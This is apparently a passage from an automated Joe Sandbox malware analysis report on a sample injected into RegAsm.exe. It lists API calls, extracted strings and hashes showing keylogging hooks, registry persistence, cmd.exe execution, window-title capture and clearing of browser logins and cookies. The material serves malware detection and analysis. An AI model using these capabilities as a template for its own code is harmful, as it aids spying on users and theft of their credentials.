                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                          APIs
                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                          • RegSetValueExW.ADVAPI32 ref: 00413888
                                          • RegCloseKey.ADVAPI32(?), ref: 00413893
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc
                                          • API String ID: 1818849710-4028850238
                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                          • String ID: bad locale name
                                          • API String ID: 3628047217-1405518554
                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FreeHandleLibraryModule
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 662261464-1276376045
                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                          • String ID: !D@
                                          • API String ID: 186401046-604454484
                                          • Opcode ID: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                          • Opcode Fuzzy Hash: bfcd2c8c1d2ae80447500fcbf9dc1f25f0f381f95e29ab0bb7edbe6635a3d2e1
                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                          APIs
                                            • Part of subcall function 10007153: GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                            • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                            • Part of subcall function 10007153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                            • Part of subcall function 10007153: _free.LIBCMT ref: 100071B8
                                            • Part of subcall function 10007153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                          • _free.LIBCMT ref: 10004F1D
                                          • _free.LIBCMT ref: 10004F24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                          • String ID: ,s$,s
                                          • API String ID: 400815659-618054613
                                          • Opcode ID: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                          • Instruction ID: eaf7f0aa003ddc14549942adb29436a4b3c466950eec5de4e21d931d64d8bd94
                                          • Opcode Fuzzy Hash: e0fe51c550968720479aec1141248534f2a92988cecb2e3b51196d93947e3756
                                          • Instruction Fuzzy Hash: 7BE0E5A6A0D99291F261D23D7D4265E1B45CBC12F5B230226FC249B1CBDDA4D801109D
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $cmd.exe$open
                                          • API String ID: 587946157-3896048727
                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                          APIs
                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                          • UnhookWindowsHookEx.USER32 ref: 0040B902
                                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: TerminateThread$HookUnhookWindows
                                          • String ID: pth_unenc
                                          • API String ID: 3123878439-4028850238
                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                          APIs
                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: GetCursorInfo$User32.dll
                                          • API String ID: 1646373207-2714051624
                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                          APIs
                                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetLastInputInfo$User32.dll
                                          • API String ID: 2574300362-1519888992
                                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                          • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                          • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                          • __freea.LIBCMT ref: 100087D5
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                          APIs
                                          Strings
                                          • Cleared browsers logins and cookies., xrefs: 0040C130
                                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                          • API String ID: 3472027048-1236744412
                                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                          APIs
                                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DisplayEnum$Devices$Monitors
                                          • String ID:
                                          • API String ID: 1432082543-0
                                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                          APIs
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQuerySleepValue
                                          • String ID: 8SG$`.p$exepath
                                          • API String ID: 4119054056-2646392161
                                          • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                          • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                                          • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                                          • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                                          APIs
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseHandleReadSize
                                          • String ID:
                                          • API String ID: 3642004256-0
                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                          APIs
                                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                          • Sleep.KERNEL32(00000064), ref: 0040A638
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$ForegroundLength
                                          • String ID: [ $ ]
                                          • API String ID: 3309952895-93608704
                                          • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                          • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 39102293-0
                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                          APIs
                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                          • String ID:
                                          • API String ID: 2633735394-0
                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                          APIs
                                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
